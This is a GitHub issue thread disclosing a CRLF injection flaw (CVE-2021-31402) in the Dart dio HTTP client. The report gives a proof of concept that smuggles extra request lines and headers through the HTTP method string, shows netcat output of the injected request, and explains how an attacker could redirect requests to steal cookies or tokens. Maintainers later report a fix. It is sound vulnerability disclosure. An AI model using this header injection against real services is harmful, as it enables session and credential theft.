Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

CRLF in dio.request #1130

Closed
1 task done
n0npax opened this issue Apr 15, 2021 · 8 comments
Closed
1 task done

CRLF in dio.request #1130

n0npax opened this issue Apr 15, 2021 · 8 comments
Labels
p: dio Targeting `dio` package s: bug Something isn't working

Comments

@n0npax
Copy link

n0npax commented Apr 15, 2021

New Issue Checklist

  • I have searched for a similar issue in the project and found none

Issue Info

ENV: Any
Examples generated on:

Dart SDK version: 2.13.0-204.0.dev (dev) (Unknown timestamp) on "linux_x64"
dio version: 4.0.0

Issue Description and Steps

Please consider given snippet:

import 'package:dio/dio.dart';

void main() async {
  var dio = Dio();
  dio.options.baseUrl = 'http://localhost:1234';
  var resp = await dio.request(
    '/test',
    options: Options(
      method: "GET http://example.com/ HTTP/1.1\r\nHost: example.com\r\nLLAMA:",
      //method: "GET",
    ),
  );
}

Generated call looks like

nc  -l -p 1234
GET HTTP://EXAMPLE.COM/ HTTP/1.1
HOST: EXAMPLE.COM
LLAMA: /test HTTP/1.1
user-agent: Dart/2.13 (dart:io)
accept-encoding: gzip
content-length: 0
host: localhost:1234

Which presents a security issue. Classic CRLF injection.

Vector attack:

If the attacker controls the HTTP method(verb), he can change a call and steal all cookies, session whatever is in a call.
Assuming flow like USER -> FOO -> BAR, where flow between FOO and BAR is internal, mentioned data may leak.

Let's assume I'm replacing example.com with my-hackery-uservice.org and the victim(service) is working in a company behind the proxy. This means I can easily redirect calls with headers/cookies(tokens) and blah blah blah. By doing more advanced CRLF I can remove the requirement for proxy at all.

Expected behavior:

if HTTP method(verb) is invalid, raise error.
@n0npax n0npax changed the title CRLF in dio.request - sec issue CRLF in dio.request Apr 15, 2021
@licy183
Copy link
Contributor

licy183 commented Apr 18, 2021

I have tested HttpClient in dart:io package, and the same problem occurs.
Maybe we should let the dart sdk resolve this issue.

@licy183 licy183 mentioned this issue Apr 18, 2021
Closed
@stale
Copy link

stale bot commented Jun 4, 2021

This issue has been automatically marked as stale because it has not had recent activity. It will be closed if no further activity occurs. If this is still an issue, please make sure it is up to date and if so, add a comment that this is still an issue to keep it open. Thank you for your contributions.

@stale stale bot added the stale label Jun 4, 2021
@OS-WS
Copy link

OS-WS commented Jun 6, 2021
edited
Loading

Hi,
This issue was assigned with CVE-2021-31402.
Was it fixed?

thanks in advance!

@stale stale bot removed the stale label Jun 6, 2021
@stale
Copy link

stale bot commented Jul 8, 2021

This issue has been automatically marked as stale because it has not had recent activity. It will be closed if no further activity occurs. If this is still an issue, please make sure it is up to date and if so, add a comment that this is still an issue to keep it open. Thank you for your contributions.

@stale stale bot added the stale label Jul 8, 2021
@stale stale bot closed this as completed Jul 21, 2021
@n0npax
Copy link
Author

n0npax commented Jul 21, 2021

Hi guys, Your bot just closed CVE related issue without fix. This CVE was scored as high(https://nvd.nist.gov/vuln/detail/CVE-2021-31402).
CC: @licy183

@licy183
Copy link
Contributor

licy183 commented Jul 22, 2021

Hi guys, Your bot just closed CVE related issue without fix. This CVE was scored as high(https://nvd.nist.gov/vuln/detail/CVE-2021-31402).
CC: @licy183

Maybe we should let the repo's owner reopen this issue.
CC: @wendux

@AlexV525 AlexV525 mentioned this issue Mar 21, 2023
Closed
@AlexV525 AlexV525 added p: dio Targeting `dio` package s: bug Something isn't working labels Mar 21, 2023
@AlexV525
Copy link
Member

As a record, this issue has been resolved by 927f79e already according to dart-lang/sdk@6abb6e5. The issue should not occur from 5.0 versions and above.

@AlexV525
Copy link
Member

GHSA-9324-jv53-9cc8

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
p: dio Targeting `dio` package s: bug Something isn't working
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
4 participants
@n0npax @AlexV525 @licy183 @OS-WS